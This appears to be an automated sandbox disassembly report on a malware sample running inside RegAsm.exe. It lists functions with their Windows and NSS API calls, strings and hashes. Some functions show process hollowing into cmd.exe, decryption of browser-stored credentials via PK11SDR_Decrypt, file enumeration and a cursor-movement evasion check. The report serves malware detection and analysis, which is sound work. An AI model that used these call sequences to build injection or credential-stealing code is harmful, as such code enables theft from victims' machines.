Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$Findlstrlen$FileHeap_memsetwsprintf$AllocCloseFirstNextProcessSystemTime
String ID: %s\%s$%s\*$K_A
API String ID: 2347508687-1624741228
Opcode ID: 2d45aad56b69257e22c84493828d34e31e8b8a1878497380ca564db6f63f63f9
Instruction ID: f1f80ab8573884d5547ab2b117a2a7bfd804ed3709ed9bfee1ddc7f274e11282
Opcode Fuzzy Hash: 2d45aad56b69257e22c84493828d34e31e8b8a1878497380ca564db6f63f63f9
Instruction Fuzzy Hash: 6F713EB19002289BDF20EF60DD49ACD77B9AF49315F0004EAA609B3151EB76AFC5CF59

Function 0041C472 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440COMMON

Download Yara Rule

Strings

/, xrefs: 0041C525
UT, xrefs: 0041C79D

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
Instruction ID: 63eef66cd8fe0e336db70064ed11a5ad7b696d25642cb4984019eb1642be8bef
Opcode Fuzzy Hash: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
Instruction Fuzzy Hash: 8E027DB19442698BDF21DF64CC807EEBBB5AF45304F0440EAD948AB242D7389EC5CF99

Function 0040F54A Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 130threadinjectionmemoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040F57C
CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,004365A7,00000000,00000000,00000001,00000004,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040F5A0
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0040F5B2
GetThreadContext.KERNEL32(?,00000000), ref: 0040F5C4
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F5E2
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040F5F8
ResumeThread.KERNEL32(?), ref: 0040F608
WriteProcessMemory.KERNEL32(?,00000000,a-A,?,00000000), ref: 0040F627
WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0040F65D
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F684
SetThreadContext.KERNEL32(?,00000000), ref: 0040F696
ResumeThread.KERNEL32(?), ref: 0040F69F

Strings

a-A, xrefs: 0040F550, 0040F620
C:\Windows\System32\cmd.exe, xrefs: 0040F59B

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$MemoryThread$Write$AllocContextResumeVirtual$CreateRead_memset
String ID: C:\Windows\System32\cmd.exe$a-A
API String ID: 3621800378-431432405
Opcode ID: e1ccbe8c928e2f1c21e5e7053cc7bb29076fa0b0443f7d3298dfd20d4594a4fa
Instruction ID: 0d24e25234c3a3ad141f65fc29eb95852bfeeab9a63bd67a8dcfe51b88e854c0
Opcode Fuzzy Hash: e1ccbe8c928e2f1c21e5e7053cc7bb29076fa0b0443f7d3298dfd20d4594a4fa
Instruction Fuzzy Hash: B5413872A00208AFEB11DFA4DC85FAAB7B9FF48705F144475FA01E6161E776AD448B24

Function 6C527810 Relevance: 21.4, APIs: 12, Strings: 2, Instructions: 372COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C59E744), ref: 6C527885
LeaveCriticalSection.KERNEL32(6C59E744), ref: 6C5278A5
EnterCriticalSection.KERNEL32(6C59E784), ref: 6C5278AD
LeaveCriticalSection.KERNEL32(6C59E784), ref: 6C5278CD
EnterCriticalSection.KERNEL32(6C59E7DC), ref: 6C5278D4
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C5278E9
EnterCriticalSection.KERNEL32(00000000), ref: 6C52795D
memset.VCRUNTIME140(?,00000000,00000160), ref: 6C5279BB
LeaveCriticalSection.KERNEL32(?), ref: 6C527BBC
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C527C82
LeaveCriticalSection.KERNEL32(6C59E7DC), ref: 6C527CD2
memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C527DAF

Strings

DYl, xrefs: 6C52789F
DYl, xrefs: 6C52787F

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavememset
String ID: DYl$DYl
API String ID: 759993129-81400873
Opcode ID: 649aff1cbffb4995fb4756e10e26e9d70fef6ff6a3cb75ebf3d663e13585228b
Instruction ID: f5b36645982220fa8d3cb63b4ece1e28d807b9738e910e41528afcae4a73000b
Opcode Fuzzy Hash: 649aff1cbffb4995fb4756e10e26e9d70fef6ff6a3cb75ebf3d663e13585228b
Instruction Fuzzy Hash: D1026071A0125A8FDB54CF29C984799B7F5FF88358F2582EAD809A7741D734AE90CF80

Function 6C557E10 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 403COMMON

Download Yara Rule

Strings

name, xrefs: 6C557ECF, 6C558335
schema, xrefs: 6C5581E3, 6C558311
data, xrefs: 6C558280, 6C5583E1
vYl, xrefs: 6C558207
(pre-xul), xrefs: 6C557E88

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: memcpystrlen
String ID: (pre-xul)$data$name$schema$vYl
API String ID: 3412268980-4162765133
Opcode ID: deed7646c1cdcf0b29cfe82f16d445dcf1b10b9b8742659477d47e269eb8e190
Instruction ID: 116657e5e63c2cf3d1c26c0e0d1a16f6251a541255a16e3e5985ff6eaaf2ee7b
Opcode Fuzzy Hash: deed7646c1cdcf0b29cfe82f16d445dcf1b10b9b8742659477d47e269eb8e190
Instruction Fuzzy Hash: E0E19FB1A043508BC710CF698C4065BFBE9BFD9314F548A2DE899E7790EBB4DD098B91

Function 6C53D4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C59E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C54D1C5), ref: 6C53D4F2
LeaveCriticalSection.KERNEL32(6C59E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C54D1C5), ref: 6C53D50B

Part of subcall function 6C51CFE0: EnterCriticalSection.KERNEL32(6C59E784), ref: 6C51CFF6
Part of subcall function 6C51CFE0: LeaveCriticalSection.KERNEL32(6C59E784), ref: 6C51D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C54D1C5), ref: 6C53D52E
EnterCriticalSection.KERNEL32(6C59E7DC), ref: 6C53D690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C53D6A6
LeaveCriticalSection.KERNEL32(6C59E7DC), ref: 6C53D712
LeaveCriticalSection.KERNEL32(6C59E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C54D1C5), ref: 6C53D751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C53D7EA

Strings

: (malloc) Error initializing arena, xrefs: 6C53D82C
<jemalloc>, xrefs: 6C53D827

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: 2cdf1a1ab0a1c8f4c1b671e35c5c629a795d386f3e12be62775dfcfcc2227b9f
Instruction ID: 3ba3aa8edae7b10e14ad71549fbc868171ca6619522b3b1097702c29f1b3248a
Opcode Fuzzy Hash: 2cdf1a1ab0a1c8f4c1b671e35c5c629a795d386f3e12be62775dfcfcc2227b9f
Instruction Fuzzy Hash: 7491D371A147A18FD714CF29C89432AB7F1FB85314F15592EE4AE87A81E770E844CB82

Function 6C574EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 6C574EFF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C574F2E
moz_xmalloc.MOZGLUE ref: 6C574F52
memset.VCRUNTIME140(00000000,00000000), ref: 6C574F62
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5752B2
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5752E6
Sleep.KERNEL32(00000010), ref: 6C575481
free.MOZGLUE(?), ref: 6C575498

Strings

(, xrefs: 6C575250

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: floor$Sleep$freememsetmoz_xmalloc
String ID: (
API String ID: 4104871533-3887548279
Opcode ID: fd9abe197d302ae5a9acb210591f11ad014d271b927423833fd22a5a33ebd07c
Instruction ID: b10ef28a921ca2065bfaa3c654b86709d4cf927814b67fdc21b0e7fe376d85d4
Opcode Fuzzy Hash: fd9abe197d302ae5a9acb210591f11ad014d271b927423833fd22a5a33ebd07c
Instruction Fuzzy Hash: 2BF1D071A19B508FC716CF39C85062BB7F5AFD6384F06872EF846A7651DB31D8428B81

Function 0040A7D8 Relevance: 15.1, APIs: 10, Instructions: 94stringencryptionCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040A815
lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A830
CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040A838
PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A846
PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A85A
PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A89A
_memmove.LIBCMT ref: 0040A8BB
lstrcatA.KERNEL32(00436803,00436807,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8E5
PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A8EC
lstrcatA.KERNEL32(00436803,0043680E,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8FB

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: K11_$Slotlstrcat$AuthenticateBinaryCryptDecryptFreeInternalString_memmove_memsetlstrlen
String ID:
API String ID: 4058207798-0
Opcode ID: a697b237291ad732cff6152e98f2904289e14e348f3c7af2acd105475d3b2c95
Instruction ID: 7253553526a9c866879b9953ce513a4e0df9f59d016b35785d070f4f95aa81eb
Opcode Fuzzy Hash: a697b237291ad732cff6152e98f2904289e14e348f3c7af2acd105475d3b2c95
Instruction Fuzzy Hash: 60315CB2D0421AAFDB10DB64DD849FAB7BCAF08345F5040BAF409E2240E7794A859F66

Function 6C555190 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 331timeCOMMON

Download Yara Rule

APIs

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C5551DF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C55529C
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6C5552FF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C55536D
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C5553F7

Part of subcall function 6C54AB89: EnterCriticalSection.KERNEL32(6C59E370,?,?,?,6C5134DE,6C59F6CC,?,?,?,?,?,?,?,6C513284), ref: 6C54AB94
Part of subcall function 6C54AB89: LeaveCriticalSection.KERNEL32(6C59E370,?,6C5134DE,6C59F6CC,?,?,?,?,?,?,?,6C513284,?,?,6C5356F6), ref: 6C54ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6C5556C3
__Init_thread_footer.LIBCMT ref: 6C5556E0

Strings

MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6C5556BE

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
String ID: MOZ_PROFILER_RECORD_OVERHEADS
API String ID: 1227157289-345010206
Opcode ID: a3c600e6adf95b7f6e37a0dfad15ba0b70aeec308b0424e488c9583a4a166d14
Instruction ID: 13a590726cc9f23ec20153f0f11f2cac80a8ff5813f395205c9fda2e9be0283c
Opcode Fuzzy Hash: a3c600e6adf95b7f6e37a0dfad15ba0b70aeec308b0424e488c9583a4a166d14
Instruction Fuzzy Hash: 46E18D71914F45CAC712CF388850267B7FABF9B394F919B0FE8AA2A951DF30A4568701

Function 0040CD37 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 298filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0040CD5C
FindFirstFileA.KERNEL32(?,?), ref: 0040CD73
StrCmpCA.SHLWAPI(?,004374EC), ref: 0040CD94
StrCmpCA.SHLWAPI(?,004374F0), ref: 0040CDAE

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

lstrlenA.KERNEL32(0040D3B5,00436872,004374F4,?,0043686F), ref: 0040CE41

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

FindNextFileA.KERNEL32(?,?), ref: 0040D23C
FindClose.KERNEL32(?), ref: 0040D250

Strings

%s\*.*, xrefs: 0040CD56

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$CloseCreatelstrcatlstrlen$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitwsprintf
String ID: %s\*.*
API String ID: 833390005-1013718255
Opcode ID: e3119fbe257bcb94e031ea0aba949192674802f0e8d62e16cea99c2e2a5aeac3
Instruction ID: 06796af3159d5870cfde4b437f7530c4b10063cc36196476c106a896cedecc2d
Opcode Fuzzy Hash: e3119fbe257bcb94e031ea0aba949192674802f0e8d62e16cea99c2e2a5aeac3
Instruction Fuzzy Hash: C6D1DA71A4112DABDF20FB25DD46ADD77B5AF44308F4100E6A908B3152DB78AFCA8F94

Function 6C577030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 6C577046
FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C577060
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C57707E

Part of subcall function 6C5281B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C5281DE

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C577096
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C57709C
LocalFree.KERNEL32(?), ref: 6C5770AA

Strings

(null), xrefs: 6C57706A, 6C577083
### ERROR: %s: %s, xrefs: 6C577087

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
String ID: ### ERROR: %s: %s$(null)
API String ID: 2989430195-1695379354
Opcode ID: cae988eb62b1cc1354fdda0dce3710e43c4785665c7d6607f97996b571dd8549
Instruction ID: 9c576abf5a357df8e41072601864c6fe06cd3f56e06bdd23c44294ef67231d6d
Opcode Fuzzy Hash: cae988eb62b1cc1354fdda0dce3710e43c4785665c7d6607f97996b571dd8549
Instruction Fuzzy Hash: 3F01FEB1A00148AFEF146F64DC0ADAF7BBCEF49214F030465F605A3241E6716D048BA5

Function 6C562C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C562C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C562C61

Part of subcall function 6C514DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C514E5A
Part of subcall function 6C514DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C514E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C562C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C562E2D

Part of subcall function 6C5281B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C5281DE

Strings

(root), xrefs: 6C56354F
ProfileBuffer parse error: %s, xrefs: 6C562E3B
expected a Time entry, xrefs: 6C562E36

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: c90ea180a59cebd182fce10d6352244b0133ea6a2302962cfa580b3705b55c39
Instruction ID: 4e64189363e8e78c37e9a3532792b2f07f44ce0ac679bef2c2e65351783d8062
Opcode Fuzzy Hash: c90ea180a59cebd182fce10d6352244b0133ea6a2302962cfa580b3705b55c39
Instruction Fuzzy Hash: FA91C0706087808FD724CF25CC9469EB7F1AFCA358F50491DE59987BA1EB30D949CB42

Function 0040180D Relevance: 12.1, APIs: 8, Instructions: 68sleepthreadCOMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 00401823
SetThreadDesktop.USER32(00000000), ref: 0040182A
GetCursorPos.USER32(?), ref: 0040183A
Sleep.KERNEL32(000003E8), ref: 0040184A
GetCursorPos.USER32(?), ref: 00401859
Sleep.KERNEL32(00002710), ref: 0040186B
Sleep.KERNEL32(000003E8), ref: 00401870
